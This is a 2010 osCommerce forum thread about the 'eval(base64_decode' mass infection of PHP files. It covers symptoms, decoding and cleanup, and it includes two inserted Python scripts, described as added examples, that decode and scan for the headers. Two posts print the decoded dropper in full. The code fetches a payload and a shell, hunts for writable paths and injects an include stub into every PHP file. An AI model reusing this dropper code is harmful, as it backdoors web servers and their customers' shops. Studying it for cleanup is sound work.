eval(base64_decode Hack
#61
Posted 02 March 2010 - 05:43 AM
#62
Posted 02 March 2010 - 03:30 PM
#63
Posted 02 March 2010 - 03:35 PM
emilesteenkamp, on 02 March 2010 - 03:30 PM, said:
I'm not sure Dreamweaver is the best choice for editing PHP files.
If you follow the links in the OP including http://forums.oscommerce.com/index.php?showtopic=344272 you will find on that thread mention of a util to search all your files for the code.
Remember, what you think I meant may not be what I thought I meant when I said it.
Contributions:
Auto Backup your Database, Easy way
Multi Images with Fancy Pop-ups, Easy way
Products in columns with multi buy etc etc
Disable any Category or Product, Easy way
Secure & Improve your account pages et al.
#64
Posted 02 March 2010 - 04:55 PM
After I have encoded it, what should I do?
Do I just paste it into my PHP file?!
#65
Posted 22 March 2010 - 11:22 AM
FIMBLE, on 01 October 2009 - 10:23 AM, said:
If your cart “suddenly” stops working as it should with no input from yourselves, it could be that you have been subject to the latest automated hack.
Some of the more common signs of this are:
* Category images stop displaying
* FCK editor refuses to display the images folder
* Payment modules stop working
* Checkout process stops working
How will you know?
Open any PHP file on your server; if at the very top you see a line like
<?php /**/eval(base64_decode('aWYoZnVuY3Rpb25fZXhpc3RzKC (Goes on for a while)
then you have been hacked.
To clean your site you have two options:
1. Delete the entire set of PHP files on your server (this hack will infect every single PHP file regardless of where it belongs, i.e. non-osC files will also be infected) and restore from a good backup. This is the best and easiest route.
2. You need to find the source of the files that have been placed on your server; they are always hidden well away from the top level. To do this you need to copy the top line and paste it into a Base64 decoder. I have my own file for this, but you will be able to use any of the many on the internet; here is one
This will reveal the location of the files you have to remove. Note that it could be from 1 file up to 30, and in some cases they will overwrite the files that should be in the host folder.
Once this is done, and the original files are restored, you have to go through every single PHP file and remove the code from the top line. I suggest you use a search / replace tool for this or it's going to take you a very long time!
When this has been done it will be good practice to “drop” your database and upload a recent backup you took prior to infection. Also check that there are no new users in the database; I've not come across this yet, but have heard it happens.
Now your site is free of the code, you need to prevent it from happening again.
How to prevent infection.
This is not guaranteed 100% proof, but it is going to help stop re-infection.
Change the name of your admin folder to something less obvious.
Delete admin/filemanager.php and associated links.
Ensure that your folder permissions are never set higher than 755.
Install some security addons,
Also some ideas from this post can help you,
If you do nothing, and do not rename your admin folder or delete the filemanager.php, it is not a question of if, more when.
There is a lot of fragmented help on the forums; I have pulled some of it together here. Read up all you can; there are a lot of great people posting good information here.
I have just tried to use the decoder that is recommended, but keep getting this error:
Invalid character in a Base-64 string
Do I need to change what I put into it?
#66
Posted 22 March 2010 - 04:45 PM
FIMBLE, on 04 October 2009 - 08:14 PM, said:
You really need to decode the line to find the place that the files are located in.
There can be a lot of files or one or two, and called different names.
style.css.php is one
dg.php another
there are .swf files also
With the decoder just add the code minus the <?php (' at the start and the ')?> at the end
Nic
I have a bit of confusion with how to get the decoder to work. This is the start:
<?php eval(gzinflate(base64_decode('FZnHDqvIFkU/p2+LATmpR2RMzhgmT+ScM1//
...and the end:
/8++///73fw==')));?>
When trying to take off the <?php and the ?> I keep getting this error: Invalid length for a Base-64 char array.
#67
Posted 22 March 2010 - 05:23 PM
Do not include this from the beginning:
eval(gzinflate(base64_decode('
OR this at the end:
'))); ?>
so everything between the opening ' and ending ' ONLY
Chris
See my Profile to learn more about add ons, templates, support plans and custom coding (click here)
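The rule Chris gives (everything between the opening ' and the closing ' only) is exactly what the web decoders expect, and the "Invalid character" / "Invalid length" errors in the posts above are what you get when the <?php or the ')); is left in. As an added example, not code from this thread or from osCommerce, here is a small Python decoder that takes the whole first line of an infected file, isolates the blob itself, undoes wrapper functions such as gzinflate() (PHP's gzinflate is raw DEFLATE), peels nested layers, and lists the file paths the decoded code names, which is the reason FIMBLE gives for decoding at all. The sample payload and the /home/example/... path it uses are constructed.

```python
"""Decode the eval(base64_decode(...)) header injected into PHP files.

Added example: not code from the thread or from osCommerce. Pass the whole
first line of an infected file; it isolates the quoted base64 text itself
(what the online decoders expect), undoes wrapper functions such as
gzinflate(), peels nested layers and lists file paths the decoded code names.
The sample payload and the /home/example/... path below are constructed.
"""
import base64
import codecs
import re
import sys
import zlib

# eval( [fn( fn( ...] base64_decode( '<blob>'  -> group 1: outer function chain,
# group 2: the base64 text between the quotes (may be wrapped across lines).
_WRAPPER = re.compile(
    r"eval\(\s*((?:\w+\(\s*)*)base64_decode\(\s*['\"]([A-Za-z0-9+/=\s]+)['\"]"
)

# PHP gzinflate() is raw DEFLATE (zlib wbits=-15); gzuncompress() data has a zlib header.
_UNWRAP = {
    "gzinflate": lambda b: zlib.decompress(b, -15),
    "gzuncompress": lambda b: zlib.decompress(b),
    "str_rot13": lambda b: codecs.encode(b.decode("latin-1"), "rot13").encode("latin-1"),
    "strrev": lambda b: b[::-1],
}


def extract_blob(text):
    """Return (outer_function_names, base64_text), or None if no wrapper is present."""
    m = _WRAPPER.search(text)
    if m is None:
        return None
    outer = re.findall(r"\w+", m.group(1))      # outermost first, e.g. ['gzinflate']
    blob = re.sub(r"\s+", "", m.group(2))       # tolerate line-wrapped blobs
    return outer, blob


def decode_layer(text):
    """Decode one eval(...) layer and return the PHP source it would execute."""
    found = extract_blob(text)
    if found is None:
        raise ValueError("no eval(base64_decode('...')) wrapper found; pass the whole line")
    outer, blob = found
    blob += "=" * (-len(blob) % 4)              # restore padding if the tail was clipped
    # 'Invalid character' errors from online decoders mean <?php or ')); was left in the blob
    data = base64.b64decode(blob, validate=True)
    for fn in reversed(outer):                  # innermost wrapper is applied first
        if fn not in _UNWRAP:
            raise ValueError("unsupported wrapper function: %s()" % fn)
        data = _UNWRAP[fn](data)
    return data.decode("latin-1")


def decode_all(text, max_layers=10):
    """Peel nested layers until plain PHP remains; returns (source, layers_peeled)."""
    layers = 0
    while layers < max_layers and extract_blob(text) is not None:
        text = decode_layer(text)
        layers += 1
    return text, layers


def referenced_paths(php_source):
    """Quoted path-like strings in decoded code: where the dropped files live."""
    return re.findall(r"['\"]((?:/|\.{1,2}/|[\w.-]+/)[\w./-]*\.\w+)['\"]", php_source)


# --- constructed sample, shaped like the include stub the dropper writes ---
SAMPLE_PAYLOAD = (
    "if(function_exists('ob_start')&&!isset($GLOBALS['mfsn'])){"
    "$GLOBALS['mfsn']='/home/example/public_html/catalog/images/x/style.css.php';"
    "if(file_exists($GLOBALS['mfsn'])){include_once($GLOBALS['mfsn']);}}"
)


def make_header(payload, inflate=False):
    """Build a header line of the shape seen in the thread (test input only)."""
    raw = payload.encode("latin-1")
    if inflate:
        comp = zlib.compressobj(9, zlib.DEFLATED, -15)
        raw = comp.compress(raw) + comp.flush()
        return "<?php eval(gzinflate(base64_decode('%s')));?>" % base64.b64encode(raw).decode()
    return "<?php /**/eval(base64_decode('%s')); ?>" % base64.b64encode(raw).decode()


if __name__ == "__main__":
    # usage: python decode_header.py infected.php   (reads only the first line)
    with open(sys.argv[1], encoding="latin-1") as fh:
        source, peeled = decode_all(fh.readline())
    print("layers peeled:", peeled)
    print(source)
    print("paths referenced:", referenced_paths(source))
```

Run it against the first line of any infected file; the decoded source is printed, never executed, and the path list is what to go and delete. If a layer uses a wrapper the table does not know, it stops with the function name rather than guessing.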
#68
Posted 22 March 2010 - 06:25 PM
DunWeb, on 22 March 2010 - 05:23 PM, said:
Do not include this from the beginning:
eval(gzinflate(base64_decode('
OR this at the end:
'))); ?>
so everything between the opening ' and ending ' ONLY
Chris
Thanks Chris. I now get this message though:
Invalid character in a Base-64 string.
#69
Posted 22 March 2010 - 07:07 PM
Quite honestly, that decoder didn't work well on a couple of eval 64 scripts that I tested. There are others available as well.
If you want to post the encoded code I will try to decode it for you.
Chris
#70
Posted 22 March 2010 - 07:38 PM
I think the only way you could not have a backup is if 1. You're hosting the site yourself, and 2. You modify files directly on the live site. Obviously there's some problems with both of those if you don't know what you're doing.
#71
Posted 23 March 2010 - 07:36 AM
DunWeb, on 22 March 2010 - 07:07 PM, said:
Quite honestly, that decoder didn't work well on a couple of eval 64 scripts that I tested. There are others available as well.
If you want to post the encoded code I will try to decode it for you.
Chris
Hi, it's strange because I have used it previously and got it to work, but it's weird this time. I will PM it to you.
Thanks.
#72
Posted 23 March 2010 - 12:39 PM
This is the decoded file:
function dg_main_exec(){ echo"<hr><div align='left'><br clear='all'>"; $pms = dgdownload($GLOBALS['dg_pu'], 60); if($pms){ echo"<b style='color:green'>{$GLOBALS['dg_pu']} [size: " . strlen($pms) . "]</b><br>[543676657]<br>"; leave_clear_php($pms); }else{ die("<b style='color:red'>{$GLOBALS['dg_pu']}</b><br>[93771902]<br>"); } $shl = dgdownload($GLOBALS['dg_eu'], 60); if($shl){ echo"<b style='color:green'>{$GLOBALS['dg_eu']} [size: " . strlen($shl) . "]</b><br>[599387883]<br>"; leave_clear_php($shl); }else{ die("<b style='color:red'>{$GLOBALS['dg_eu']}</b><br>[759303755]<br>"); } flush(); $ddrs = array(); $dgmssp = array(); $a = false; $GLOBALS['dgdirs'] = array(); echo"<h3>LOOKING FOR THE LONGEST PATH</h3><small>"; $tmp = explode("/", $GLOBALS['fpath']); $path = ''; $c = 0; foreach($tmp as $key=>$val){ if(!$val && $c){ continue; } $c++; $path .= $val . "/"; if(strlen($GLOBALS['dgsp']) > strlen($path)){ continue; } if($path <> '/'){ if(isset($_GET['details'])){ echo"<h4>GOTO: $path</h4>";flush(); } fddir($path, $ddrs, $a); if(count($ddrs) > 0){ break; } } } if(!count($ddrs)){ if(isset($_GET['details'])){ echo"<h4>GOTO: {$GLOBALS['dgsp']}</h4>";flush(); } fddir($GLOBALS['dgsp'], $ddrs, $a); } echo"</small>";flush(); $max = 0; $GLOBALS['dgcp'] = ''; $sep = ''; foreach($ddrs as $key=>$val){ if(!$sep){ if(!(strpos($key, '/') === false)){ $sep = '/'; }else{ $sep = '\\'; } } $fldr = explode($sep, $key); $c = count($fldr); if($max < $c){ $max = $c; $GLOBALS['dgcp'] = implode($sep, $fldr); } } if(!$GLOBALS['dgcp']){ die('<b style="color:red">nowhere to write anything</b><br>[4356398573]'); } if($GLOBALS['dgsp'] == $GLOBALS['dgcp']){ die("<b style='color:red'>can't save to the document root</b><br>[657834657]"); } echo"the longest available path: <b>{$GLOBALS['dgcp']}</b><br>"; $GLOBALS['dgcp'] = str_replace('\\', '/', $GLOBALS['dgcp']); /*setting up filenames*/ if(!replace_substring($pms, '$GLOBALS[\'dgcp\'] = "', '";', $GLOBALS['dgcp'])){ die("<b style='color:red'>failed 
to set path</b><br>[44883279]"); } echo"<b style='color:green'>path of main script successfully set [{$GLOBALS['dgcp']}]</b><br>[5482745]<br>"; if(!replace_substring($pms, '$GLOBALS[\'dgin\'] = "', '";', $GLOBALS['dgin'])){ die("<b style='color:red'>failed to set name</b><br>[58819152]"); } echo"<b style='color:green'>name of main script successfully set [{$GLOBALS['dgin']}]</b><br>[2246876]<br>"; if(!replace_substring($pms, '$GLOBALS[\'dgsp\'] = "', '";', $GLOBALS['dgsp'])){ die("<b style='color:red'>failed to set relative root dir</b><br>[58819152]"); } echo"<b style='color:green'>relative root dir successfully set [{$GLOBALS['dgsp']}]</b><br>[5893301]<br>"; /*fix start*/ $fn = 'admin/file_manager.php'; if(file_exists($fn)){ $fc = implode("", file($fn)); $src = "require('includes/application_top.php')"; $cue = 'if(strpos(strtolower($_SERVER[\'REQUEST_URI\']), \'file_manager.php/login.php?action=save\') > 0){die();}'; $fc = str_replace($src, "$cue\n $src", $fc); $f = fopen($fn, "w"); if($f){ fwrite($f, $fc); fflush($f); fclose($f); } } /*fix end*/ $packed_js = prepare_pack($pms); $my_size = strval(strlen($packed_js)); while(strlen($my_size) < 7){$my_size = '0' . 
$my_size;} if(!replace_substring($pms, '"00'.'0', '";', $my_size)){ die("<b style='color:red'>failed to set size</b><br>[86612935]"); } $packed_js = prepare_pack($pms); echo"<br>my packed size: $my_size<br>"; save_text_to_file($GLOBALS['dgcp'].$GLOBALS['dgin'], $packed_js, "<b style='color:green'>main script path [{$GLOBALS['dgcp']}{$GLOBALS['dgin']}]</b><br>[48839]<br>", 1, $silent); save_text_to_file($GLOBALS['dgcp'].$GLOBALS['dgsf'], $shl, "<b style='color:green'>shell path [{$GLOBALS['dgcp']}{$GLOBALS['dgsf']}]</b><br>[58392]<br>", 1); $str = "if(function_exists('ob_start')&&!isset(\$GLOBALS['mfsn'])){\$GLOBALS['mfsn']='{$GLOBALS['dgcp']}{$GLOBALS['dgin']}';if(file_exists(\$GLOBALS['mfsn'])){include_once(\$GLOBALS['mfsn']);if(function_exists('gml')&&function_exists('dgobh')){ob_start('dgobh');}}}"; $str = "<?php /**/eval(base64_decode('" . base64_encode($str) . "')); ?>"; echo"<small>"; echo"<h3>INJECTING PHP FILES</h3>"; $GLOBALS['dgdirs'] = array(); $GLOBALS['dgfiles'] = array(); echo"<h4>GOTO: {$GLOBALS['dgsp']}</h4>";flush(); phpinj($GLOBALS['dgsp'], $str, 1, 0); $tmp = explode("/", $GLOBALS['fpath']); $path = ''; $c = 0; foreach($tmp as $key=>$val){ if(!$val && $c){ continue; } $c++; $path .= $val . "/"; if(strlen($GLOBALS['dgsp']) > strlen($path)){ continue; } echo"<h4>GOTO: $path</h4>"; phpinj($path, $str, 1, 0); } /*remove expl. use only if executed as separete file*/ /*if(file_exists($GLOBALS['dgmn'])){unlink($GLOBALS['dgmn']);}*/ die("</small><hr><b>dgok</b></div>"); } if(isset($_GET['dginit'])){ dg_main_init(); }else{ echo"--- c99 ---"; }
Chris
#73
Posted 23 March 2010 - 02:25 PM
DunWeb, on 23 March 2010 - 12:39 PM, said:
This is the decoded file:
function dg_main_exec(){ echo"<hr><div align='left'><br clear='all'>"; $pms = dgdownload($GLOBALS['dg_pu'], 60); if($pms){ echo"<b style='color:green'>{$GLOBALS['dg_pu']} [size: " . strlen($pms) . "]</b><br>[543676657]<br>"; leave_clear_php($pms); }else{ die("<b style='color:red'>{$GLOBALS['dg_pu']}</b><br>[93771902]<br>"); } $shl = dgdownload($GLOBALS['dg_eu'], 60); if($shl){ echo"<b style='color:green'>{$GLOBALS['dg_eu']} [size: " . strlen($shl) . "]</b><br>[599387883]<br>"; leave_clear_php($shl); }else{ die("<b style='color:red'>{$GLOBALS['dg_eu']}</b><br>[759303755]<br>"); } flush(); $ddrs = array(); $dgmssp = array(); $a = false; $GLOBALS['dgdirs'] = array(); echo"<h3>LOOKING FOR THE LONGEST PATH</h3><small>"; $tmp = explode("/", $GLOBALS['fpath']); $path = ''; $c = 0; foreach($tmp as $key=>$val){ if(!$val && $c){ continue; } $c++; $path .= $val . "/"; if(strlen($GLOBALS['dgsp']) > strlen($path)){ continue; } if($path <> '/'){ if(isset($_GET['details'])){ echo"<h4>GOTO: $path</h4>";flush(); } fddir($path, $ddrs, $a); if(count($ddrs) > 0){ break; } } } if(!count($ddrs)){ if(isset($_GET['details'])){ echo"<h4>GOTO: {$GLOBALS['dgsp']}</h4>";flush(); } fddir($GLOBALS['dgsp'], $ddrs, $a); } echo"</small>";flush(); $max = 0; $GLOBALS['dgcp'] = ''; $sep = ''; foreach($ddrs as $key=>$val){ if(!$sep){ if(!(strpos($key, '/') === false)){ $sep = '/'; }else{ $sep = '\\'; } } $fldr = explode($sep, $key); $c = count($fldr); if($max < $c){ $max = $c; $GLOBALS['dgcp'] = implode($sep, $fldr); } } if(!$GLOBALS['dgcp']){ die('<b style="color:red">nowhere to write anything</b><br>[4356398573]'); } if($GLOBALS['dgsp'] == $GLOBALS['dgcp']){ die("<b style='color:red'>can't save to the document root</b><br>[657834657]"); } echo"the longest available path: <b>{$GLOBALS['dgcp']}</b><br>"; $GLOBALS['dgcp'] = str_replace('\\', '/', $GLOBALS['dgcp']); /*setting up filenames*/ if(!replace_substring($pms, '$GLOBALS[\'dgcp\'] = "', '";', $GLOBALS['dgcp'])){ die("<b style='color:red'>failed 
to set path</b><br>[44883279]"); } echo"<b style='color:green'>path of main script successfully set [{$GLOBALS['dgcp']}]</b><br>[5482745]<br>"; if(!replace_substring($pms, '$GLOBALS[\'dgin\'] = "', '";', $GLOBALS['dgin'])){ die("<b style='color:red'>failed to set name</b><br>[58819152]"); } echo"<b style='color:green'>name of main script successfully set [{$GLOBALS['dgin']}]</b><br>[2246876]<br>"; if(!replace_substring($pms, '$GLOBALS[\'dgsp\'] = "', '";', $GLOBALS['dgsp'])){ die("<b style='color:red'>failed to set relative root dir</b><br>[58819152]"); } echo"<b style='color:green'>relative root dir successfully set [{$GLOBALS['dgsp']}]</b><br>[5893301]<br>"; /*fix start*/ $fn = 'admin/file_manager.php'; if(file_exists($fn)){ $fc = implode("", file($fn)); $src = "require('includes/application_top.php')"; $cue = 'if(strpos(strtolower($_SERVER[\'REQUEST_URI\']), \'file_manager.php/login.php?action=save\') > 0){die();}'; $fc = str_replace($src, "$cue\n $src", $fc); $f = fopen($fn, "w"); if($f){ fwrite($f, $fc); fflush($f); fclose($f); } } /*fix end*/ $packed_js = prepare_pack($pms); $my_size = strval(strlen($packed_js)); while(strlen($my_size) < 7){$my_size = '0' . 
$my_size;} if(!replace_substring($pms, '"00'.'0', '";', $my_size)){ die("<b style='color:red'>failed to set size</b><br>[86612935]"); } $packed_js = prepare_pack($pms); echo"<br>my packed size: $my_size<br>"; save_text_to_file($GLOBALS['dgcp'].$GLOBALS['dgin'], $packed_js, "<b style='color:green'>main script path [{$GLOBALS['dgcp']}{$GLOBALS['dgin']}]</b><br>[48839]<br>", 1, $silent); save_text_to_file($GLOBALS['dgcp'].$GLOBALS['dgsf'], $shl, "<b style='color:green'>shell path [{$GLOBALS['dgcp']}{$GLOBALS['dgsf']}]</b><br>[58392]<br>", 1); $str = "if(function_exists('ob_start')&&!isset(\$GLOBALS['mfsn'])){\$GLOBALS['mfsn']='{$GLOBALS['dgcp']}{$GLOBALS['dgin']}';if(file_exists(\$GLOBALS['mfsn'])){include_once(\$GLOBALS['mfsn']);if(function_exists('gml')&&function_exists('dgobh')){ob_start('dgobh');}}}"; $str = "<?php /**/eval(base64_decode('" . base64_encode($str) . "')); ?>"; echo"<small>"; echo"<h3>INJECTING PHP FILES</h3>"; $GLOBALS['dgdirs'] = array(); $GLOBALS['dgfiles'] = array(); echo"<h4>GOTO: {$GLOBALS['dgsp']}</h4>";flush(); phpinj($GLOBALS['dgsp'], $str, 1, 0); $tmp = explode("/", $GLOBALS['fpath']); $path = ''; $c = 0; foreach($tmp as $key=>$val){ if(!$val && $c){ continue; } $c++; $path .= $val . "/"; if(strlen($GLOBALS['dgsp']) > strlen($path)){ continue; } echo"<h4>GOTO: $path</h4>"; phpinj($path, $str, 1, 0); } /*remove expl. use only if executed as separete file*/ /*if(file_exists($GLOBALS['dgmn'])){unlink($GLOBALS['dgmn']);}*/ die("</small><hr><b>dgok</b></div>"); } if(isset($_GET['dginit'])){ dg_main_init(); }else{ echo"--- c99 ---"; }
Chris
Cheers Chris. How do I find out what file the hack is in?
#74
Posted 23 March 2010 - 05:14 PM
I am going to guess you still have file_manager.php in your admin directory. This is the vulnerability but the code is using 3 files:
catalog/admin/file_manager.php
catalog/admin/login.php
catalog/includes/application_top.php
I suggest you read these:
http://forums.oscommerce.com/topic/313323-how-to-secure-your-site/
http://forums.oscommerce.com/index.php?showtopic=340995
Chris
#75
Posted 23 March 2010 - 06:06 PM
DunWeb, on 23 March 2010 - 05:14 PM, said:
I am going to guess you still have file_manager.php in your admin directory. This is the vulnerability but the code is using 3 files:
catalog/admin/file_manager.php
catalog/admin/login.php
catalog/includes/application_top.php
I suggest you read these:
http://forums.oscommerce.com/topic/313323-how-to-secure-your-site/
http://forums.oscommerce.com/index.php?showtopic=340995
Chris
Hey Chris,
I have removed file manager, but I guess they must have slipped in beforehand. I just started the site 3-4 days ago, so they have been quick! I noticed it because there was a thumbs.php file outside of my main files when I looked on FTP, so I removed it and checked other files, but it hasn't looked like it has spread into all my files like I have had happen before. I will check those other files though. Thanks.
#76
Posted 24 March 2010 - 07:42 AM
Whiskers, on 23 March 2010 - 06:06 PM, said:
I have removed file manager, but I guess they must have slipped in beforehand. I just started the site 3-4 days ago, so they have been quick! I noticed it because there was a thumbs.php file outside of my main files when I looked on FTP, so I removed it and checked other files, but it hasn't looked like it has spread into all my files like I have had happen before. I will check those other files though. Thanks.
I checked the login and application files, but there is no mention of hack code in those files? Should I be looking for something specific?
#77
Posted 26 March 2010 - 10:34 PM
Warning: session_start() [function.session-start]: Cannot send session cookie - headers already sent by (output started at /home/beachbab/public_html/catalog/index.php:2) in /home/beachbab/public_html/catalog/includes/functions/sessions.php on line 103
Now my one site is clean and the message is gone. On my other one I even dumped all the files and reloaded twice, comparing against my last good save, but cannot find an extra file that could be causing this warning. Any other suggestions?
#78
Posted 26 March 2010 - 10:45 PM
Read this thread and apply the necessary changes to secure your admin:
http://forums.oscommerce.com/index.php?showtopic=340995
Then read this one to secure the site:
http://forums.oscommerce.com/topic/313323-how-to-secure-your-site/
Chris
#79
Posted 26 March 2010 - 10:56 PM
Whiskers, on 24 March 2010 - 07:42 AM, said:
Try to scan your site with this contribution.
regards
sijo
---------------
Contrib: JMrating10 - Rate your products / osCommerce VTS - Virus & Threat Scanner
(osCommerce VTS now also checks for leading and trailing whitespace and also has a grep function)
#80
Posted 26 March 2010 - 11:02 PM
montana_girl, on 26 March 2010 - 10:34 PM, said:
looks typical of the standard whitespace issue in the file given
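FIMBLE's cleanup step (strip the injected top line from every PHP file, with a search / replace tool rather than by hand) and the "headers already sent ... index.php:2" warning that Geoffrey puts down to the standard whitespace issue can be handled by one pass over the tree. The following is an added example, not code from this thread or from osCommerce: it walks a site root, tags each PHP file with what it finds (the injected header, an eval(base64_decode( elsewhere, a BOM, or blank space before <?php), and can strip the header and the leftover whitespace after writing a .bak copy. It decodes and runs nothing. The tree it scans when started without arguments is constructed in a temporary directory and the blob in its demo index.php is a harmless stand-in.

```python
"""Scan a site tree for the injected eval(base64_decode(...)) header and for the
leftover whitespace/BOM before <?php that produces 'headers already sent'.

Added example, not code from the thread or from osCommerce. The demo tree is
constructed in a temporary directory and its 'blob' is a harmless stand-in;
nothing here decodes or runs the payload. A .bak copy is written before any
file is rewritten.
"""
import base64
import os
import re
import sys
import tempfile

# The header as quoted in the thread: <?php /**/eval(base64_decode('...')); ?> plus its line break.
INJECTED = re.compile(
    rb"^<\?php\s*(?:/\*\*/)?\s*eval\(base64_decode\('[A-Za-z0-9+/=]+'\)\);\s*\?>[ \t]*\r?\n?"
)
# eval(base64_decode( anywhere else (gzinflate variants included) is reported, not touched.
ANYWHERE = re.compile(rb"eval\s*\(\s*(?:\w+\s*\(\s*)*base64_decode\s*\(")
BOM = b"\xef\xbb\xbf"
PHP_EXT = (".php", ".phtml", ".inc")


def inspect_file(path):
    """Classify one PHP file; returns a set of tags (empty set means it looks clean)."""
    with open(path, "rb") as fh:
        data = fh.read()
    tags = set()
    if INJECTED.match(data):
        tags.add("injected-header")
    elif ANYWHERE.search(data):
        tags.add("eval-base64-elsewhere")
    if data.startswith(BOM):
        tags.add("utf8-bom")                     # a BOM is output too, before session_start()
        data = data[len(BOM):]
    if data[:1].isspace() and data.lstrip().startswith(b"<?php"):
        tags.add("leading-whitespace")           # blank line 1 -> 'output started at ...:2'
    return tags


def clean_file(path, dry_run=False):
    """Strip the injected header plus any BOM/whitespace left in front of <?php.
    Returns True when the file would change (and did, unless dry_run)."""
    with open(path, "rb") as fh:
        data = fh.read()
    cleaned = INJECTED.sub(b"", data, count=1)
    if cleaned.startswith(BOM):
        cleaned = cleaned[len(BOM):]
    if cleaned.lstrip().startswith(b"<?php"):
        cleaned = cleaned.lstrip()
    if cleaned == data:
        return False
    if not dry_run:
        with open(path + ".bak", "wb") as fh:
            fh.write(data)
        with open(path, "wb") as fh:
            fh.write(cleaned)
    return True


def scan_tree(root):
    """Walk root; return {relative_path: sorted_tags} for every PHP file that is not clean."""
    findings = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if name.lower().endswith(PHP_EXT):
                full = os.path.join(dirpath, name)
                tags = inspect_file(full)
                if tags:
                    findings[os.path.relpath(full, root)] = sorted(tags)
    return findings


def build_demo_tree():
    """Constructed stand-in for a hacked catalog/ tree (demo data, not a real site)."""
    root = tempfile.mkdtemp(prefix="osc_demo_")
    blob = base64.b64encode(b"/* constructed stand-in, nothing executable */").decode()
    files = {
        "index.php": "<?php /**/eval(base64_decode('%s')); ?>\n<?php\n  require('includes/application_top.php');\n?>\n" % blob,
        "includes/functions/sessions.php": "<?php\nfunction tep_session_start() { return session_start(); }\n?>\n",
        "images/thumbs.php": "\n<?php\n// blank line 1 above is output: headers already sent\n?>\n",
        "admin/shell_test.php": "<?php\n$f = '';\neval(gzinflate(base64_decode($f)));\n?>\n",
    }
    for rel, body in files.items():
        full = os.path.join(root, rel)
        os.makedirs(os.path.dirname(full), exist_ok=True)
        with open(full, "wb") as fh:
            fh.write(body.encode("utf-8"))
    return root


if __name__ == "__main__":
    # usage: python scan_headers.py /path/to/catalog [--fix]   (no args: scans the demo tree)
    args = [a for a in sys.argv[1:] if a != "--fix"]
    root = args[0] if args else build_demo_tree()
    for rel, tags in sorted(scan_tree(root).items()):
        changed = "--fix" in sys.argv and clean_file(os.path.join(root, rel))
        print("%-45s %s%s" % (rel, ",".join(tags), "  [cleaned]" if changed else ""))
```

Run it without --fix first and read the list: files tagged injected-header are the mass infection, files tagged eval-base64-elsewhere or sitting in odd places (an images/ folder, like the thumbs.php Whiskers found) are candidates for the dropped files themselves and want a look rather than an automatic edit. Whitespace and BOM fixes only apply when the file really does start with <?php after the stripped bytes, so a file that legitimately begins with HTML is left alone.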